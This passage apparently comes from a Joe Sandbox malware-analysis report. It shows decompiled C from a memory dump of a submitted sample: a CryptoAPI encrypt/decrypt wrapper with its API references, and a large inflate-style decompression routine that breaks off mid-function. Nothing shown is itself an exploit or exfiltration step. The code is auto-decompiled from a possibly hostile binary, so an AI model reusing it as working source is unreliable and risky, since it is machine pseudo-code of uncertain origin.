    					 *_t71 = 0x208;
    					_t71[4] = 0x660e;
    					_t71[8] = _t82;
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					_t51 = CryptImportKey(_v16, _t71, 0x1c, 0, 0,  &_v8);
    					if(_t51 == 0) {
    						L12:
    						CryptReleaseContext(_v16, 0);
    						 *0x3b8540(_v12);
    						 *0x3b8540(_t71);
    						goto L13;
    					}
    					__imp__CryptSetKeyParam(_v8, 1, _a20, 0);
    					if(_t51 == 0) {
    						L11:
    						CryptDestroyKey(_v8);
    						goto L12;
    					}
    					_t84 = _a8;
    					memcpy(_v12, _a4, _t84);
    					_v20 = _t84;
    					if(_a24 == 0) {
    						if(CryptDecrypt(_v8, 0, 1, 0, _v12,  &_v20) != 0) {
    							L16:
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							memcpy(_a12, _v12, _a8);
    							CryptDestroyKey(_v8);
    							CryptReleaseContext(_v16, 0);
    							 *0x3b8540(_v12);
    							 *0x3b8540(_t71);
    							return _v20;
    						}
    						goto L11;
    					}
    					_t67 =  &_v20;
    					__imp__CryptEncrypt(_v8, 0, 1, 0, _v12, _t67, _t84 + _t84);
    					if(_t67 == 0) {
    						goto L11;
    					}
    					goto L16;
    				}
    			}
















    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000024,?,?,00000001,?,0000000F,00000010), ref: 003AEFA8
    • CryptImportKey.ADVAPI32(00000000,00000000,0000001C,00000000,00000000,00000010,00000010), ref: 003AEFF7
    • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 003AF00A
    • memcpy.MSVCRT ref: 003AF01E
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000000), ref: 003AF040
    • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 003AF05D
    • CryptDestroyKey.ADVAPI32(?), ref: 003AF06A
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003AF074
    • memcpy.MSVCRT ref: 003AF0AA
    • CryptDestroyKey.ADVAPI32(?), ref: 003AF0B5
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003AF0C0
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 99%
    			E003A257B(int* __esi, signed int _a4, signed int* _a8, intOrPtr _a12, signed int _a16, signed int _a20, signed int _a24) {
    				void* _v8;
    				unsigned int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed char* _v24;
    				void* _v28;
    				signed int _v32;
    				signed char _v36;
    				signed int _v40;
    				signed int _v44;
    				intOrPtr _v48;
    				signed int _v52;
    				int _v56;
    				signed int _v60;
    				intOrPtr _v124;
    				intOrPtr _v128;
    				void _v192;
    				void* _t811;
    				signed int _t812;
    				signed int* _t815;
    				void* _t816;
    				signed int _t821;
    				signed int _t822;
    				signed int _t831;
    				void* _t834;
    				signed int _t835;
    				void* _t841;
    				void* _t842;
    				signed int _t843;
    				signed int _t844;
    				signed int _t845;
    				signed int _t847;
    				signed int _t850;
    				signed int _t851;
    				signed int _t852;
    				signed int* _t854;
    				signed int _t858;
    				unsigned int _t861;
    				signed int _t862;
    				signed int _t867;
    				signed int _t871;
    				signed int _t875;
    				int _t880;
    				signed int _t884;
    				signed int _t896;
    				signed int _t900;
    				void* _t902;
    				signed int _t905;
    				void* _t908;
    				signed int _t912;
    				int _t916;
    				intOrPtr* _t919;
    				char* _t922;
    				signed int _t926;
    				signed char* _t933;
    				signed int _t937;
    				signed int _t940;
    				signed int _t941;
    				signed int _t943;
    				signed int _t951;
    				signed int _t952;
    				char* _t953;
    				signed char* _t955;
    				signed int _t959;
    				signed int _t962;
    				signed int _t963;
    				signed int _t965;
    				signed int _t968;
    				signed int _t972;
    				signed int _t988;
    				void* _t989;
    				int _t992;
    				signed int _t1002;
    				signed int _t1004;
    				int _t1005;
    				signed int _t1012;
    				signed int _t1013;
    				signed char* _t1014;
    				signed int _t1018;
    				signed int _t1021;
    				signed int _t1022;
    				signed int _t1024;
    				signed int _t1025;
    				signed int _t1026;
    				signed int _t1027;
    				signed int _t1030;
    				signed int _t1043;
    				signed int _t1044;
    				signed int _t1045;
    				signed int _t1053;
    				signed int _t1055;
    				signed int _t1056;
    				signed int _t1058;
    				signed int _t1059;
    				signed int _t1060;
    				signed int _t1062;
    				signed int _t1063;
    				signed int _t1065;
    				signed int _t1066;
    				signed int _t1067;
    				signed int _t1068;
    				void* _t1090;
    				signed int _t1091;
    				signed int _t1093;
    				void* _t1104;
    				signed int _t1105;
    				signed int* _t1107;
    				signed int _t1108;
    				void* _t1112;
    				void* _t1113;
    				signed int _t1117;
    				signed int _t1118;
    				signed int _t1119;
    				signed char* _t1122;
    				signed char _t1131;
    				signed char _t1144;
    				void* _t1150;
    				intOrPtr _t1151;
    				signed char _t1157;
    				signed char _t1163;
    				signed int _t1168;
    				signed int* _t1175;
    				short* _t1176;
    				signed char _t1177;
    				signed char _t1178;
    				signed int _t1180;
    				signed int _t1182;
    				signed char _t1186;
    				signed char _t1187;
    				signed int _t1190;
    				intOrPtr* _t1191;
    				signed int _t1200;
    				signed char _t1207;
    				signed char _t1212;
    				int _t1222;
    				signed char* _t1226;
    				signed char* _t1228;
    				signed char* _t1230;
    				signed char* _t1232;
    				signed char* _t1234;
    				signed char* _t1243;
    				char* _t1297;
    				intOrPtr _t1298;
    				signed int _t1299;
    				intOrPtr* _t1312;
    				signed int _t1313;
    				signed int _t1316;
    				signed int _t1318;
    				signed char* _t1336;
    				signed int _t1337;
    				int _t1338;
    				void* _t1340;
    				void* _t1341;
    				void* _t1342;
    				void* _t1343;
    				void* _t1344;
    				void* _t1345;
    				void* _t1346;
    				signed int _t1347;
    				signed int _t1348;
    				signed int _t1357;
    				signed int _t1358;
    				char* _t1359;
    				char* _t1362;
    				signed int _t1366;
    				void* _t1368;
    				signed int _t1369;
    				int _t1375;
    				int _t1379;
    				int* _t1381;
    				void* _t1382;
    				void* _t1383;
    				void* _t1389;
    				void* _t1390;
    
    				_t1381 = __esi;
    				_t1243 = _a4;
    				_v20 = _v20 | 0xffffffff;
    				_t1090 = _a16;
    				_t811 =  *_a20;
    				_v48 = _t811 + _t1090;
    				_t1336 =  &(_t1243[ *_a8]);
    				_t1117 = _a24 & 0x00000004;
    				_v8 = _t1243;
    				_v24 = _t1336;
    				_v28 = _t1090;
    				_v44 = _t1117;
    				if(_t1117 == 0) {
    					_t812 = _t811 - _a12;
    					__eflags = _t812;
    					_t16 = _t1090 - 1; // 0xfe
    					_t1118 = _t812 + _t16;
    				} else {
    					_t1118 = _t1117 | 0xffffffff;
    				}
    				_t17 = _t1118 + 1; // 0xff
    				_v60 = _t1118;
    				if((_t1118 & _t17) != 0 || _t1090 < _a12) {
    					 *_a20 =  *_a20 & 0x00000000;
    					_t815 = _a8;
    					 *_t815 =  *_t815 & 0x00000000;
    					__eflags =  *_t815;
    					_t816 = 0xfffffffd;
    					return _t816;
    				} else {
    					_t1091 = _t1381[1];
    					_t1119 = _t1381[8];
    					_v12 = _t1381[0xe];
    					_v16 = _t1381[9];
    					_v36 = _t1381[0xa];
    					_v56 = _t1381[0xf];
    					_t821 =  *_t1381;
    					_v32 = _t1091;
    					_v40 = _t1119;
    					_t1389 = _t821 - 0x18;
    					if(_t1389 > 0) {
    						__eflags = _t821 - 0x26;
    						if(__eflags > 0) {
    							_t822 = _t821 - 0x27;
    							__eflags = _t822;
    							if(_t822 == 0) {
    								L394:
    								 *_t1381 = 0x27;
    								L395:
    								_v20 = _v20 | 0xffffffff;
    								L396:
    								_t1381[0xe] = _v12;
    								_t1381[8] = _v40;
    								_t1381[9] = _v16;
    								_t1381[0xa] = _v36;
    								_t1381[0xf] = _v56;
    								_t1381[1] = _t1091;
    								 *_a8 = _v8 - _a4;
    								_t831 = _v28 - _a16;
    								 *_a20 = _t831;
    								if((_a24 & 0x00000009) == 0 || _v20 < 0) {
    									L410:
    									return _v20;
    								} else {
    									_t1122 = _a16;
    									_a16 = _t1381[7] & 0x0000ffff;
    									_a20 = _t831;
    									_t1337 = _t1381[7] & 0x0000ffff;
    									_t1093 = _a16;
    									_a4 = _t831 % 0x15b0;
    									if(_a20 == 0) {
    										L406:
    										_t1338 = _t1337 + (_t1093 << 0x10);
    										_t1381[7] = _t1338;
    										if(_v20 == 0 && (_a24 & 0x00000001) != 0 && _t1338 != _t1381[4]) {
    											_v20 = 0xfffffffe;
    										}
    										goto L410;
    									} else {
    										goto L399;
    									}
    									do {
    										L399:
    										_a16 = _a16 & 0x00000000;
    										_t834 = 7;
    										if(_a4 <= _t834) {
    											L402:
    											_t835 = _a4;
    											if(_a16 >= _t835) {
    												goto L405;
    											}
    											_t841 = _t835 - _a16;
    											do {
    												_t1337 = _t1337 + ( *_t1122 & 0x000000ff);
    												_t1122 =  &(_t1122[1]);
    												_t1093 = _t1093 + _t1337;
    												_t841 = _t841 - 1;
    											} while (_t841 != 0);
    											goto L405;
    										}
    										_t842 = _t834 - _t1122;
    										do {
    											_t1340 = _t1337 + ( *_t1122 & 0x000000ff);
    											_t1341 = _t1340 + (_t1122[1] & 0x000000ff);
    											_t1342 = _t1341 + (_t1122[2] & 0x000000ff);
    											_t1343 = _t1342 + (_t1122[3] & 0x000000ff);
    											_a16 = _a16 + 8;
    											_t1344 = _t1343 + (_t1122[4] & 0x000000ff);
    											_t1345 = _t1344 + (_t1122[5] & 0x000000ff);
    											_t1346 = _t1345 + (_t1122[6] & 0x000000ff);
    											_t1337 = _t1346 + (_t1122[7] & 0x000000ff);
    											_t1122 =  &(_t1122[8]);
    											_t1093 = _t1093 + _t1340 + _t1341 + _t1342 + _t1343 + _t1344 + _t1345 + _t1346 + _t1337;
    										} while ( &(_t1122[_t842]) < _a4);
    										goto L402;
    										L405:
    										_t1337 = _t1337 % 0xfff1;
    										_t796 =  &_a20;
    										 *_t796 = _a20 - _a4;
    										_a4 = 0x15b0;
    										_t1093 = _t1093 % 0xfff1;
    									} while ( *_t796 != 0);
    									goto L406;
    								}
    							}
    							_t843 = _t822 - 1;
    							__eflags = _t843;
    							if(_t843 == 0) {
    								L393:
    								 *_t1381 = 0x28;
    								goto L395;
    							}
    							_t844 = _t843 - 1;
    							__eflags = _t844;
    							if(_t844 == 0) {
    								__eflags = _t1243 - _t1336;
    								if(_t1243 >= _t1336) {
    									L376:
    									__eflags = _a24 & 0x00000002;
    									if((_a24 & 0x00000002) != 0) {
    										_v20 = 1;
    										 *_t1381 = 0x29;
    										goto L396;
    									}
    									_t845 = 0;
    									__eflags = 0;
    									L378:
    									_v12 = _v12 | _t845 << _t1091;
    									_t1091 = _t1091 + 8;
    									__eflags = _t1091;
    									L379:
    									__eflags = _t1091 - 8;
    									if(_t1091 >= 8) {
    										_t847 = _v12 & 0x000000ff;
    										_v12 = _v12 >> 8;
    										_t1091 = _t1091 - 8;
    										__eflags = _t1091;
    										L383:
    										_t720 =  &_v16;
    										 *_t720 = _v16 + 1;
    										__eflags =  *_t720;
    										_t1381[4] = _t1381[4] << 0x00000008 | _t847;
    										L384:
    										__eflags = _v16 - 4;
    										if(_v16 >= 4) {
    											L392:
    											_v20 = _v20 & 0x00000000;
    											 *_t1381 = 0x22;
    											goto L396;
    										}
    										__eflags = _t1091;
    										if(_t1091 != 0) {
    											goto L379;
    										}
    										__eflags = _v8 - _t1336;
    										if(_v8 < _t1336) {
    											_t847 =  *_v8 & 0x000000ff;
    											_v8 = _v8 + 1;
    											goto L383;
    										}
    										L387:
    										__eflags = _a24 & 0x00000002;
    										if((_a24 & 0x00000002) != 0) {
    											_v20 = 1;
    											 *_t1381 = 0x2a;
    											goto L396;
    										}
    										_t847 = 0;
    										goto L383;
    									}
    									__eflags = _v8 - _t1336;
    									if(_v8 >= _t1336) {
    										goto L376;
    									}
    									_t845 =  *_v8 & 0x000000ff;
    									_v8 = _v8 + 1;
    									goto L378;
    								}
    								_t845 =  *_t1243 & 0x000000ff;
    								_v8 =  &(_t1243[1]);
    								goto L378;
    							}
    							_t850 = _t844 - 1;
    							__eflags = _t850;
    							if(_t850 == 0) {
    								__eflags = _t1243 - _t1336;
    								if(_t1243 >= _t1336) {
    									goto L387;
    								}
    								_t847 =  *_t1243 & 0x000000ff;
    								_v8 =  &(_t1243[1]);
    								goto L383;
    							}
    							_t851 = _t850 - 9;
    							__eflags = _t851;
    							if(_t851 == 0) {
    								__eflags = _t1243 - _t1336;
    								if(_t1243 >= _t1336) {
    									L92:
    									__eflags = _a24 & 0x00000002;
    									if((_a24 & 0x00000002) != 0) {
    										_v20 = 1;
    										 *_t1381 = 0x33;
    										goto L396;
    									}
    									_t852 = 0;
    									__eflags = 0;
    									L94:
    									_v12 = _v12 | _t852 << _t1091;
    									_t1091 = _t1091 + 8;
    									__eflags = _t1091;
    									L95:
    									__eflags = _t1091 - 8;
    									if(_t1091 >= 8) {
    										_t1119 = _v12 & 0x000000ff;
    										_v12 = _v12 >> 8;
    										_v40 = _t1119;
    										_t1091 = _t1091 - 8;
    										__eflags = _t1091;
    										L99:
    										_t854 = _v28;
    										__eflags = _t854 - _v48;
    										if(_t854 >= _v48) {
    											_v20 = 2;
    											 *_t1381 = 0x34;
    											goto L396;
    										}
    										 *_t854 = _t1119;
    										_t117 =  &_v16;
    										 *_t117 = _v16 - 1;
    										__eflags =  *_t117;
    										_v28 =  &(_t854[0]);
    										L101:
    										__eflags = _v16;
    										if(_v16 == 0) {
    											L113:
    											__eflags = _t1381[5] & 0x00000001;
    											if((_t1381[5] & 0x00000001) == 0) {
    												L121:
    												__eflags = _t1091 - 3;
    												if(_t1091 < 3) {
    													__eflags = _v8 - _v24;
    													if(_v8 < _v24) {
    														_t858 =  *_v8 & 0x000000ff;
    														_t152 =  &_v8;
    														 *_t152 = _v8 + 1;
    														__eflags =  *_t152;
    														L120:
    														_v12 = _v12 | _t858 << _t1091;
    														_t1091 = _t1091 + 8;
    														__eflags = _t1091;
    														goto L121;
    													}
    													L117:
    													__eflags = _a24 & 0x00000002;
    													if((_a24 & 0x00000002) != 0) {
    														_v20 = 1;
    														 *_t1381 = 3;
    														goto L396;
    													}
    													_t858 = 0;
    													goto L120;
    												}
    												_v12 = _v12 >> 3;
    												_t861 = _v12 & 0x00000007;
    												_t1091 = _t1091 - 3;
    												_t1381[5] = _t861;
    												_t862 = _t861 >> 1;
    												__eflags = _t862;
    												_v32 = _t1091;
    												_t1381[6] = _t862;
    												if(_t862 == 0) {
    													L322:
    													__eflags = _t1091 - (_t1091 & 0x00000007);
    													if(_t1091 < (_t1091 & 0x00000007)) {
    														__eflags = _v8 - _v24;
    														if(_v8 < _v24) {
    															_t867 =  *_v8 & 0x000000ff;
    															_t622 =  &_v8;
    															 *_t622 = _v8 + 1;
    															__eflags =  *_t622;
    															L321:
    															_v12 = _v12 | _t867 << _t1091;
    															_t1091 = _t1091 + 8;
    															__eflags = _t1091;
    															goto L322;
    														}
    														L318:
    														__eflags = _a24 & 0x00000002;
    														if((_a24 & 0x00000002) != 0) {
    															_v20 = 1;
    															 *_t1381 = 5;
    															goto L396;
    														}
    														_t867 = 0;
    														goto L321;
    													}
    													_t1131 = _t1091 & 0x00000007;
    													_v12 = _v12 >> _t1131;
    													_t1091 = _t1091 - _t1131;
    													_t628 =  &_v16;
    													 *_t628 = _v16 & 0x00000000;
    													__eflags =  *_t628;
    													L324:
    													__eflags = _v16 - 4;
    													if(_v16 >= 4) {
    														_t871 = (_t1381[0xa48] & 0x000000ff) << 0x00000008 | _t1381[0xa48] & 0x000000ff;
    														_v16 = _t871;
    														__eflags = _t871 - (((_t1381[0xa48] & 0x000000ff) << 0x00000008 | _t1381[0xa48] & 0x000000ff) ^ 0x0000ffff);
    														if(_t871 != (((_t1381[0xa48] & 0x000000ff) << 0x00000008 | _t1381[0xa48] & 0x000000ff) ^ 0x0000ffff)) {
    															goto L394;
    														}
    														_t1336 = _v24;
    														goto L101;
    													}
    													__eflags = _t1091;
    													if(_t1091 != 0) {
    														L334:
    														__eflags = _t1091 - 8;
    														if(_t1091 < 8) {
    															__eflags = _v8 - _v24;
    															if(_v8 < _v24) {
    																_t884 =  *_v8 & 0x000000ff;
    																_t645 =  &_v8;
    																 *_t645 = _v8 + 1;
    																__eflags =  *_t645;
    																L333:
    																_v12 = _v12 | _t884 << _t1091;
    																_t1091 = _t1091 + 8;
    																__eflags = _t1091;
    																goto L334;
    															}
    															L330:
    															__eflags = _a24 & 0x00000002;
    															if((_a24 & 0x00000002) != 0) {
    																_v20 = 1;
    																 *_t1381 = 6;
    																goto L396;
    															}
    															_t884 = 0;
    															goto L333;
    														}
    														_v12 = _v12 >> 8;
    														 *( &(_t1381[0xa48]) + _v16) = _v12;
    														_t1091 = _t1091 - 8;
    														L337:
    														_v16 = _v16 + 1;
    														goto L324;
    													}
    													__eflags = _v8 - _v24;
    													if(_v8 < _v24) {
    														_t657 =  &_v8;
    														 *_t657 = _v8 + 1;
    														__eflags =  *_t657;
    														 *( &(_t1381[0xa48]) + _v16) =  *_v8;
    														goto L337;
    													}
    													L327:
    													__eflags = _a24 & 0x00000002;
    													if((_a24 & 0x00000002) != 0) {
    														_v20 = 1;
    														 *_t1381 = 7;
    														goto L396;
    													}
    													 *( &(_t1381[0xa48]) + _v16) = 0;
    													goto L337;
    												}
    												__eflags = _t862 - 3;
    												if(_t862 == 3) {
    													L349:
    													 *_t1381 = 0xa;
    													goto L395;
    												}
    												__eflags = _t862 - 1;
    												if(_t862 != 1) {
    													_t1347 = 0;
    													__eflags = 0;
    													L127:
    													_v16 = _t1347;
    													__eflags = _t1347 - 3;
    													if(_t1347 >= 3) {
    														memset( &(_t1381[0x6e0]), 0, 0x120);
    														_t1383 = _t1383 + 0xc;
    														_t202 =  &_v16;
    														 *_t202 = _v16 & 0x00000000;
    														__eflags =  *_t202;
    														L137:
    														__eflags = _v16 - _t1381[0xd];
    														if(_v16 < _t1381[0xd]) {
    															L161:
    															__eflags = _t1091 - 3;
    															if(_t1091 < 3) {
    																__eflags = _v8 - _v24;
    																if(_v8 < _v24) {
    																	_t896 =  *_v8 & 0x000000ff;
    																	_t261 =  &_v8;
    																	 *_t261 = _v8 + 1;
    																	__eflags =  *_t261;
    																	L160:
    																	_v12 = _v12 | _t896 << _t1091;
    																	_t1091 = _t1091 + 8;
    																	__eflags = _t1091;
    																	goto L161;
    																}
    																L157:
    																__eflags = _a24 & 0x00000002;
    																if((_a24 & 0x00000002) != 0) {
    																	_v20 = 1;
    																	 *_t1381 = 0xe;
    																	goto L396;
    																}
    																_t896 = 0;
    																goto L160;
    															}
    															_t267 = _v16 + 0x3b6620; // 0x121110
    															_v12 = _v12 >> 3;
    															_t1091 = _t1091 - 3;
    															_v16 = _v16 + 1;
    															_v32 = _t1091;
    															 *((char*)( &(_t1381[0x6e0]) + ( *_t267 & 0x000000ff))) = _v12 & 0x00000007;
    															goto L137;
    														}
    														_t1381[0xd] = 0x13;
    														L139:
    														_t900 = _t1381[6];
    														__eflags = _t900;
    														if(_t900 < 0) {
    															while(1) {
    																L215:
    																_t902 = _v24 - _v8;
    																__eflags = _t902 - 4;
    																if(_t902 < 4) {
    																	break;
    																}
    																__eflags = _v48 - _v28 - 2;
    																if(_v48 - _v28 < 2) {
    																	break;
    																}
    																__eflags = _t1091 - 0xf;
    																if(_t1091 < 0xf) {
    																	_v8 = _v8 + 2;
    																	_v12 = _v12 | ( *_v8 & 0x0000ffff) << _t1091;
    																	_t1091 = _t1091 + 0x10;
    																	__eflags = _t1091;
    																}
    																_t968 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
    																__eflags = _t968;
    																if(_t968 < 0) {
    																	_t1357 = 0xa;
    																	do {
    																		_t968 =  *((short*)(_t1381 + 0x960 + ((_v12 >> _t1357 & 0x00000001) +  !_t968) * 2));
    																		_t1357 = _t1357 + 1;
    																		__eflags = _t968;
    																	} while (_t968 < 0);
    																	goto L223;
    																} else {
    																	_t1357 = _t968 >> 9;
    																	L223:
    																	_v12 = _v12 >> _t1357;
    																	_t1091 = _t1091 - _t1357;
    																	_v16 = _t968;
    																	__eflags = _t968 & 0x00000100;
    																	if((_t968 & 0x00000100) != 0) {
    																		L256:
    																		_v16 = _v16 & 0x000001ff;
    																		__eflags = _v16 - 0x100;
    																		if(_v16 == 0x100) {
    																			goto L113;
    																		}
    																		_t908 = _v16 * 4 - 0x404;
    																		_t482 = _t908 + 0x3b64a0; // 0x0
    																		_t1187 =  *_t482;
    																		_t483 = _t908 + 0x3b6420; // 0x1
    																		_v36 = _t1187;
    																		_v16 =  *_t483;
    																		__eflags = _t1187;
    																		if(_t1187 == 0) {
    																			L266:
    																			__eflags = _t1091 - 0xf;
    																			if(_t1091 >= 0xf) {
    																				L282:
    																				_t912 =  *((short*)(_t1381 + 0xf00 + (_v12 & 0x000003ff) * 2));
    																				__eflags = _t912;
    																				if(_t912 < 0) {
    																					_t1358 = 0xa;
    																					do {
    																						_t912 =  *((short*)(_t1381 + 0x1700 + ((_v12 >> _t1358 & 0x00000001) +  !_t912) * 2));
    																						_t1358 = _t1358 + 1;
    																						__eflags = _t912;
    																					} while (_t912 < 0);
    																					L286:
    																					_v12 = _v12 >> _t1358;
    																					_t1190 =  *(0x3b65a0 + _t912 * 4);
    																					_t1091 = _t1091 - _t1358;
    																					_v36 = _t1190;
    																					_v40 =  *((intOrPtr*)(0x3b6520 + _t912 * 4));
    																					__eflags = _t1190;
    																					if(_t1190 == 0) {
    																						L295:
    																						_t1191 = _v28;
    																						_t916 = _t1191 - _a12;
    																						_v56 = _t916;
    																						__eflags = _v40 - _t916;
    																						if(_v40 <= _t916) {
    																							L297:
    																							_t919 = (_t916 - _v40 & _v60) + _a12;
    																							__eflags = _t1191 - _t919;
    																							if(_t1191 <= _t919) {
    																								_t1191 = _t919;
    																							}
    																							__eflags = _t1191 + _v16 - _v48;
    																							if(_t1191 + _v16 <= _v48) {
    																								__eflags = _v16 - 9;
    																								if(_v16 < 9) {
    																									L312:
    																									_t1359 = _v28;
    																									do {
    																										L313:
    																										_v16 = _v16 - 3;
    																										 *_t1359 =  *_t919;
    																										 *((char*)(_t1359 + 1)) =  *((intOrPtr*)(_t919 + 1));
    																										 *((char*)(_t1359 + 2)) =  *((intOrPtr*)(_t919 + 2));
    																										_t1359 = _t1359 + 3;
    																										_t919 = _t919 + 3;
    																										__eflags = _v16 - 2;
    																									} while (_v16 > 2);
    																									__eflags = _v16;
    																									_v28 = _t1359;
    																									if(_v16 <= 0) {
    																										continue;
    																									}
    																									__eflags = _v16 - 1;
    																									 *_t1359 =  *_t919;
    																									if(_v16 <= 1) {
    																										L311:
    																										_v28 = _t1359 + _v16;
    																										continue;
    																									}
    																									L310:
    																									 *((char*)(_t1359 + 1)) =  *((intOrPtr*)(_t919 + 1));
    																									goto L311;
    																								}
    																								__eflags = _v16 - _v40;
    																								if(_v16 > _v40) {
    																									goto L312;
    																								}
    																								_t1362 = _v28;
    																								_t1200 = (_v16 & 0xfffffff8) + _t919;
    																								__eflags = _t1200;
    																								do {
    																									 *_t1362 =  *_t919;
    																									 *((intOrPtr*)(_t1362 + 4)) =  *((intOrPtr*)(_t919 + 4));
    																									_t919 = _t919 + 8;
    																									_t1362 = _t1362 + 8;
    																									__eflags = _t919 - _t1200;
    																								} while (_t919 < _t1200);
    																								_v16 = _v16 & 0x00000007;
    																								__eflags = _v16 - 3;
    																								_v28 = _t1362;
    																								if(_v16 >= 3) {
    																									goto L313;
    																								}
    																								__eflags = _v16;
    																								if(_v16 == 0) {
    																									continue;
    																								}
    																								__eflags = _v16 - 1;
    																								 *_t1362 =  *_t919;
    																								if(_v16 <= 1) {
    																									goto L311;
    																								}
    																								goto L310;
    																							} else {
    																								L300:
    																								_v16 = _v16 - 1;
    																								__eflags = _v16;
    																								if(_v16 == 0) {
    																									continue;
    																								}
    																								L301:
    																								_t922 = _v28;
    																								__eflags = _t922 - _v48;
    																								if(_t922 >= _v48) {
    																									_v20 = 2;
    																									 *_t1381 = 0x35;
    																									goto L396;
    																								}
    																								 *_t922 =  *((intOrPtr*)((_v56 - _v40 & _v60) + _a12));
    																								_v56 = _v56 + 1;
    																								_v28 = _t922 + 1;
    																								goto L300;
    																							}
    																						}
    																						__eflags = _a24 & 0x00000004;
    																						if((_a24 & 0x00000004) != 0) {
    																							L81:
    																							 *_t1381 = 0x25;
    																							goto L395;
    																						}
    																						goto L297;
    																					}
    																					L293:
    																					__eflags = _t1091 - _v36;
    																					if(_t1091 < _v36) {
    																						__eflags = _v8 - _v24;
    																						if(_v8 < _v24) {
    																							_t926 =  *_v8 & 0x000000ff;
    																							_t552 =  &_v8;
    																							 *_t552 = _v8 + 1;
    																							__eflags =  *_t552;
    																							L292:
    																							_v12 = _v12 | _t926 << _t1091;
    																							_t1091 = _t1091 + 8;
    																							__eflags = _t1091;
    																							goto L293;
    																						}
    																						L289:
    																						__eflags = _a24 & 0x00000002;
    																						if((_a24 & 0x00000002) != 0) {
    																							_v20 = 1;
    																							 *_t1381 = 0x1b;
    																							goto L396;
    																						}
    																						_t926 = 0;
    																						goto L292;
    																					}
    																					_t1207 = _v36;
    																					_t1091 = _t1091 - _t1207;
    																					_v12 = _v12 >> _t1207;
    																					_t561 =  &_v40;
    																					 *_t561 = _v40 + ((1 << _t1207) - 0x00000001 & _v12);
    																					__eflags =  *_t561;
    																					goto L295;
    																				}
    																				_t1358 = _t912 >> 9;
    																				_t912 = _t912 & 0x000001ff;
    																				goto L286;
    																			}
    																			_t933 = _v8;
    																			__eflags = _v24 - _t933 - 2;
    																			if(_v24 - _t933 >= 2) {
    																				_v8 =  &(_t933[2]);
    																				_v12 = _v12 | (_t933[1] & 0x000000ff) << _t1091 + 0x00000008 | ( *_t933 & 0x000000ff) << _t1091;
    																				_t1091 = _t1091 + 0x10;
    																				__eflags = _t1091;
    																				goto L282;
    																			}
    																			L268:
    																			_t937 =  *((short*)(_t1381 + 0xf00 + (_v12 & 0x000003ff) * 2));
    																			__eflags = _t937;
    																			if(_t937 < 0) {
    																				_t1212 = 0xa;
    																				__eflags = _t1091 - _t1212;
    																				if(_t1091 <= _t1212) {
    																					L275:
    																					__eflags = _v8 - _v24;
    																					if(_v8 < _v24) {
    																						_t940 =  *_v8 & 0x000000ff;
    																						_t521 =  &_v8;
    																						 *_t521 = _v8 + 1;
    																						__eflags =  *_t521;
    																						L279:
    																						_t941 = _t940 << _t1091;
    																						_t1091 = _t1091 + 8;
    																						_v12 = _v12 | _t941;
    																						__eflags = _t1091 - 0xf;
    																						if(_t1091 < 0xf) {
    																							goto L268;
    																						}
    																						goto L282;
    																					}
    																					L276:
    																					__eflags = _a24 & 0x00000002;
    																					if((_a24 & 0x00000002) != 0) {
    																						_v20 = 1;
    																						 *_t1381 = 0x1a;
    																						goto L396;
    																					}
    																					_t940 = 0;
    																					goto L279;
    																				} else {
    																					goto L273;
    																				}
    																				while(1) {
    																					L273:
    																					_t937 =  *((short*)(_t1381 + 0x1700 + ((_v12 >> _t1212 & 0x00000001) +  !_t937) * 2));
    																					_t1212 = _t1212 + 1;
    																					__eflags = _t937;
    																					if(_t937 >= 0) {
    																						goto L282;
    																					}
    																					_t514 = _t1212 + 1; // 0xc
    																					__eflags = _t1091 - _t514;
    																					if(_t1091 >= _t514) {
    																						continue;
    																					}
    																					goto L275;
    																				}
    																				goto L282;
    																			}
    																			_t943 = _t937 >> 9;
    																			__eflags = _t943;
    																			if(_t943 == 0) {
    																				goto L275;
    																			}
    																			__eflags = _t1091 - _t943;
    																			if(_t1091 >= _t943) {
    																				goto L282;
    																			}
    																			goto L275;
    																		}
    																		__eflags = _t1091 - _t1187;
    																		if(_t1091 >= _t1187) {
    																			L265:
    																			_t1091 = _t1091 - _v36;
    																			_v12 = _v12 >> _t1187;
    																			_t502 =  &_v16;
    																			 *_t502 = _v16 + ((1 << _t1187) - 0x00000001 & _v12);
    																			__eflags =  *_t502;
    																			goto L266;
    																		}
    																		L259:
    																		__eflags = _v8 - _v24;
    																		if(_v8 < _v24) {
    																			_t951 =  *_v8 & 0x000000ff;
    																			_t492 =  &_v8;
    																			 *_t492 = _v8 + 1;
    																			__eflags =  *_t492;
    																			L263:
    																			_t952 = _t951 << _t1091;
    																			_t1091 = _t1091 + 8;
    																			_v12 = _v12 | _t952;
    																			__eflags = _t1091 - _v36;
    																			if(_t1091 < _v36) {
    																				goto L259;
    																			}
    																			_t1187 = _v36;
    																			goto L265;
    																		}
    																		L260:
    																		__eflags = _a24 & 0x00000002;
    																		if((_a24 & 0x00000002) != 0) {
    																			_v20 = 1;
    																			 *_t1381 = 0x19;
    																			goto L396;
    																		}
    																		_t951 = 0;
    																		goto L263;
    																	}
    																	__eflags = _t1091 - 0xf;
    																	if(_t1091 < 0xf) {
    																		_v8 = _v8 + 2;
    																		_v12 = _v12 | ( *_v8 & 0x0000ffff) << _t1091;
    																		_t1091 = _t1091 + 0x10;
    																		__eflags = _t1091;
    																	}
    																	_t972 =  *((short*)(_t1381 + 0x160 + (_v12 & 0x000003ff) * 2));
    																	__eflags = _t972;
    																	if(_t972 < 0) {
    																		_t1366 = 0xa;
    																		do {
